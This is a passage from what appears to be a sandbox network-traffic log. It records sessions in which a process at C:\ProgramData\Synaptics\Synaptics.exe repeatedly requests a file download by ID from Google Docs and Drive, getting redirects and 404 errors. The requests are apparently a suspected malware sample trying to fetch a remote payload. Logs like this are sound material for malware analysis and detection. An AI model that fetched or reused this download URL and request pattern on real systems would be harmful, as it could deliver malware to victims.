                                                                                                                      2024-12-30 10:40:52 UTC | 1390 | IN | Data Ascii: 404 (Not Found)!!1</title><style nonce="8wYzw3ylt_ofRmpNpyyxGw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                      2024-12-30 10:40:52 UTC | 122 | IN | Data Ascii: b> <ins>That’s an error.</ins><p>The requested URL was not found on this server. <ins>That’s all we know.</ins></main>


                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                      47 | 192.168.2.6 | 49915 | 142.250.185.65 | 443 | 4508 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                      2024-12-30 10:40:52 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Cookie: NID=520=XEpDunbM2jQWLDhJ4ZLTX75bwqESkJo47WZJ2ujDLcGVKux2c-y7Jt7SY2aovNvhVjyCrbsCNa1YWwhYHv1wufDt8UkHy2EpzgZJne1VtYUPaU7sFeHdum4NnesSqtEqek7CrfPHvlEkK3tH86_IjZKl8iznNzk3DIi_ygFA8ncsOsTOg97wWyr7
                                                                                                                      2024-12-30 10:40:53 UTC | 1250 | IN | HTTP/1.1 404 Not Found
                                                                                                                      X-GUploader-UploadID: AFiumC78_eg5XewAkuh3xck0WBShnNvQxtkSfqlnfZl19gkkD4nqOC-5vGn5r_DuaHeIja9YWIlK9wQ
                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                      Pragma: no-cache
                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                      Date: Mon, 30 Dec 2024 10:40:52 GMT
                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-zSvyTcHj0D2JUch8206yEg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                      Content-Length: 1652
                                                                                                                      Server: UploadServer
                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                      Connection: close
                                                                                                                      2024-12-30 10:40:53 UTC | 140 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                      2024-12-30 10:40:53 UTC | 1390 | IN | Data Ascii: 404 (Not Found)!!1</title><style nonce="FA9Xep5AlQ8_84ON37o3nA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                      2024-12-30 10:40:53 UTC | 122 | IN | Data Ascii: b> <ins>That’s an error.</ins><p>The requested URL was not found on this server. <ins>That’s all we know.</ins></main>


                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                      48 | 192.168.2.6 | 49916 | 142.250.185.78 | 443 | 4508 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                      2024-12-30 10:40:52 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                      Host: docs.google.com
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Cookie: NID=520=e0MMv7cRp-grNJHjXrhAU_LA_LGSTbCZR5NB_desh_k7u6ozgnbyf-rkVtUkhybO-lKzptPcJJZjB-xAJNIFGwk0KWu6Y9PwmuNL9n0wmFo0cAoquhAgWdfbz5KTJ_SR5jmhs53G5hp-aFYyyktNAAdNZkhq4RLUKINiF2gb5PdPOd-hORFA-PF-
                                                                                                                      2024-12-30 10:40:52 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                      Content-Type: application/binary
                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                      Pragma: no-cache
                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                      Date: Mon, 30 Dec 2024 10:40:52 GMT
                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-hZLAouUMrCw_0rmbClwgLw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                      Server: ESF
                                                                                                                      Content-Length: 0
                                                                                                                      X-XSS-Protection: 0
                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                      Connection: close


                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                      49 | 192.168.2.6 | 49917 | 142.250.185.78 | 443 | 4508 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                      2024-12-30 10:40:52 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                      Host: docs.google.com
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Cookie: NID=520=e0MMv7cRp-grNJHjXrhAU_LA_LGSTbCZR5NB_desh_k7u6ozgnbyf-rkVtUkhybO-lKzptPcJJZjB-xAJNIFGwk0KWu6Y9PwmuNL9n0wmFo0cAoquhAgWdfbz5KTJ_SR5jmhs53G5hp-aFYyyktNAAdNZkhq4RLUKINiF2gb5PdPOd-hORFA-PF-
                                                                                                                      2024-12-30 10:40:53 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                      Content-Type: application/binary
                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                      Pragma: no-cache
                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                      Date: Mon, 30 Dec 2024 10:40:52 GMT
                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-kVq5zSizLjOxxIDjoEMgpg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                      Server: ESF
                                                                                                                      Content-Length: 0
                                                                                                                      X-XSS-Protection: 0
                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                      Connection: close


                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                      50 | 192.168.2.6 | 49920 | 142.250.185.65 | 443 | 4508 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                      2024-12-30 10:40:52 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Cookie: NID=520=XEpDunbM2jQWLDhJ4ZLTX75bwqESkJo47WZJ2ujDLcGVKux2c-y7Jt7SY2aovNvhVjyCrbsCNa1YWwhYHv1wufDt8UkHy2EpzgZJne1VtYUPaU7sFeHdum4NnesSqtEqek7CrfPHvlEkK3tH86_IjZKl8iznNzk3DIi_ygFA8ncsOsTOg97wWyr7
                                                                                                                      2024-12-30 10:40:53 UTC | 1250 | IN | HTTP/1.1 404 Not Found
                                                                                                                      X-GUploader-UploadID: AFiumC4oY-GARncQEDZ0cQsqEoc_K2TW44oOfLJAeJQFdJUUUMNON3kQKfblRU08_YkDXavKap0qP64
                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                      Pragma: no-cache
                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                      Date: Mon, 30 Dec 2024 10:40:53 GMT
                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-VsqyH0TSWQkn3H0OQGuqlA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                      Content-Length: 1652
                                                                                                                      Server: UploadServer
                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                      Connection: close
                                                                                                                      2024-12-30 10:40:53 UTC | 140 | IN
                                                                                                                      Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                      2024-12-30 10:40:53 UTC | 1390 | IN
                                                                                                                      Data Ascii: 404 (Not Found)!!1</title><style nonce="asnqT-TuceZ0oeOSr2JMZg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                      2024-12-30 10:40:53 UTC | 122 | IN
                                                                                                                      Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                      51 | 192.168.2.6 | 49926 | 142.250.185.78 | 443 | 4508 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                      2024-12-30 10:40:53 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                      Host: docs.google.com
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Cookie: NID=520=e0MMv7cRp-grNJHjXrhAU_LA_LGSTbCZR5NB_desh_k7u6ozgnbyf-rkVtUkhybO-lKzptPcJJZjB-xAJNIFGwk0KWu6Y9PwmuNL9n0wmFo0cAoquhAgWdfbz5KTJ_SR5jmhs53G5hp-aFYyyktNAAdNZkhq4RLUKINiF2gb5PdPOd-hORFA-PF-


                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                      52 | 192.168.2.6 | 49928 | 142.250.185.65 | 443 | 4508 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                      2024-12-30 10:40:53 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Cookie: NID=520=XEpDunbM2jQWLDhJ4ZLTX75bwqESkJo47WZJ2ujDLcGVKux2c-y7Jt7SY2aovNvhVjyCrbsCNa1YWwhYHv1wufDt8UkHy2EpzgZJne1VtYUPaU7sFeHdum4NnesSqtEqek7CrfPHvlEkK3tH86_IjZKl8iznNzk3DIi_ygFA8ncsOsTOg97wWyr7


                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                      53 | 192.168.2.6 | 49929 | 142.250.185.78 | 443 | 4508 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                      2024-12-30 10:40:53 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                      Host: docs.google.com
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Cookie: NID=520=e0MMv7cRp-grNJHjXrhAU_LA_LGSTbCZR5NB_desh_k7u6ozgnbyf-rkVtUkhybO-lKzptPcJJZjB-xAJNIFGwk0KWu6Y9PwmuNL9n0wmFo0cAoquhAgWdfbz5KTJ_SR5jmhs53G5hp-aFYyyktNAAdNZkhq4RLUKINiF2gb5PdPOd-hORFA-PF-


                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                      54 | 192.168.2.6 | 49930 | 142.250.185.65 | 443 | 4508 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                      2024-12-30 10:40:53 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Cookie: NID=520=XEpDunbM2jQWLDhJ4ZLTX75bwqESkJo47WZJ2ujDLcGVKux2c-y7Jt7SY2aovNvhVjyCrbsCNa1YWwhYHv1wufDt8UkHy2EpzgZJne1VtYUPaU7sFeHdum4NnesSqtEqek7CrfPHvlEkK3tH86_IjZKl8iznNzk3DIi_ygFA8ncsOsTOg97wWyr7


                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                      55 | 192.168.2.6 | 49936 | 142.250.185.78 | 443 | 4508 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                      2024-12-30 10:40:54 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                      Host: docs.google.com
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Cookie: NID=520=e0MMv7cRp-grNJHjXrhAU_LA_LGSTbCZR5NB_desh_k7u6ozgnbyf-rkVtUkhybO-lKzptPcJJZjB-xAJNIFGwk0KWu6Y9PwmuNL9n0wmFo0cAoquhAgWdfbz5KTJ_SR5jmhs53G5hp-aFYyyktNAAdNZkhq4RLUKINiF2gb5PdPOd-hORFA-PF-
                                                                                                                      2024-12-30 10:40:54 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                      Content-Type: application/binary
                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                      Pragma: no-cache
                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                      Date: Mon, 30 Dec 2024 10:40:54 GMT
                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-fhaVjna-dPJg6YR8mI7x4Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                      Server: ESF
                                                                                                                      Content-Length: 0
                                                                                                                      X-XSS-Protection: 0
                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                      Connection: close


                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                      56 | 192.168.2.6 | 49935 | 142.250.185.78 | 443 | 4508 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                      2024-12-30 10:40:54 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                      Host: docs.google.com
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Cookie: NID=520=e0MMv7cRp-grNJHjXrhAU_LA_LGSTbCZR5NB_desh_k7u6ozgnbyf-rkVtUkhybO-lKzptPcJJZjB-xAJNIFGwk0KWu6Y9PwmuNL9n0wmFo0cAoquhAgWdfbz5KTJ_SR5jmhs53G5hp-aFYyyktNAAdNZkhq4RLUKINiF2gb5PdPOd-hORFA-PF-
                                                                                                                      2024-12-30 10:40:54 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                      Content-Type: application/binary
                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                      Pragma: no-cache
                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                      Date: Mon, 30 Dec 2024 10:40:54 GMT
                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-ZmfhtEEWQMD3_bhqPFTxGA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                      Server: ESF
                                                                                                                      Content-Length: 0
                                                                                                                      X-XSS-Protection: 0
                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                      Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
57 | 192.168.2.6 | 49944 | 142.250.185.65 | 443 | 4508 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:40:55 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Cookie: NID=520=XEpDunbM2jQWLDhJ4ZLTX75bwqESkJo47WZJ2ujDLcGVKux2c-y7Jt7SY2aovNvhVjyCrbsCNa1YWwhYHv1wufDt8UkHy2EpzgZJne1VtYUPaU7sFeHdum4NnesSqtEqek7CrfPHvlEkK3tH86_IjZKl8iznNzk3DIi_ygFA8ncsOsTOg97wWyr7
2024-12-30 10:40:55 UTC | 1243 | IN | HTTP/1.1 404 Not Found
                                                                                                                      X-GUploader-UploadID: AFiumC4aTYrtBO3tIK5UUqTTSEIdd_UNmZ-azqQVolpSNPrzBheJjWsiy_n6qxMbkH-0F-hf
                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                      Pragma: no-cache
                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                      Date: Mon, 30 Dec 2024 10:40:55 GMT
                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-ftZtmqNplQUJXpFMnoCf1g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                      Content-Length: 1652
                                                                                                                      Server: UploadServer
                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                      Connection: close
2024-12-30 10:40:55 UTC | 147 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
2024-12-30 10:40:55 UTC | 1390 | IN | Data Ascii: t Found)!!1</title><style nonce="TQ5YLAh4Ms-3JGTaBTB9Ow">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
2024-12-30 10:40:55 UTC | 115 | IN | Data Ascii: >That’s an error.</ins><p>The requested URL was not found on this server. <ins>That’s all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
58 | 192.168.2.6 | 49943 | 142.250.185.78 | 443 | 4508 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:40:55 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                      Host: docs.google.com
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Cookie: NID=520=e0MMv7cRp-grNJHjXrhAU_LA_LGSTbCZR5NB_desh_k7u6ozgnbyf-rkVtUkhybO-lKzptPcJJZjB-xAJNIFGwk0KWu6Y9PwmuNL9n0wmFo0cAoquhAgWdfbz5KTJ_SR5jmhs53G5hp-aFYyyktNAAdNZkhq4RLUKINiF2gb5PdPOd-hORFA-PF-
2024-12-30 10:40:55 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                      Content-Type: application/binary
                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                      Pragma: no-cache
                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                      Date: Mon, 30 Dec 2024 10:40:55 GMT
                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-lV1bhbGSJpeSRYhVm6jc4g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                      Server: ESF
                                                                                                                      Content-Length: 0
                                                                                                                      X-XSS-Protection: 0
                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                      Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
59 | 192.168.2.6 | 49946 | 142.250.185.78 | 443 | 4508 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 10:40:55 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                      Host: docs.google.com
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Cookie: NID=520=e0MMv7cRp-grNJHjXrhAU_LA_LGSTbCZR5NB_desh_k7u6ozgnbyf-rkVtUkhybO-lKzptPcJJZjB-xAJNIFGwk0KWu6Y9PwmuNL9n0wmFo0cAoquhAgWdfbz5KTJ_SR5jmhs53G5hp-aFYyyktNAAdNZkhq4RLUKINiF2gb5PdPOd-hORFA-PF-
2024-12-30 10:40:55 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                      Content-Type: application/binary
                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                      Pragma: no-cache
